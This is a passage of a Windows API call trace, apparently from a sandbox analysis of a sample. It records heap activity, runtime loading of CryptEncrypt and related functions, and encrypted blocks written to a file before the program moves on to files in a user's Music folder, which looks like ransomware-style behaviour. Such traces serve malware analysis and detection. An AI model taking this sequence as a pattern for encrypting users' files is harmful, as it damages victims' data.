Size=0x10) returned 0x43ca3d0 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0110.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0110.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0110.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.132] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0110.132] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2550, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2550*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.134] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.134] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.134] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0110.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.135] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.135] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.136] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.136] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca550, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.138] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x200) returned 1 [0110.138] CharLowerBuffW (in: lpsz="byte[513]", cchLength=0x9 | out: lpsz="byte[513]") returned 0x9 [0110.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.138] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43fac98*, pdwDataLen=0x144e790*=0x1f8, dwBufLen=0x200 | out: pbData=0x43fac98*, pdwDataLen=0x144e790*=0x200) returned 1 [0110.138] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.138] WriteFile (in: hFile=0x298, lpBuffer=0x43e8288*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43e8288*, lpNumberOfBytesWritten=0x144f194*=0x200, lpOverlapped=0x0) returned 1 [0110.139] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0110.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0110.140] CryptDestroyKey (hKey=0x41ac100) returned 1 [0110.140] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.140] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0110.140] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0110.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.140] FreeLibrary (hLibModule=0x756e0000) returned 1 [0110.140] CloseHandle (hObject=0x258) returned 1 [0110.140] CloseHandle (hObject=0x298) returned 1 [0110.142] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFilePart=0x0) returned 0x21 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0110.142] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini")) returned 0x26 [0110.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 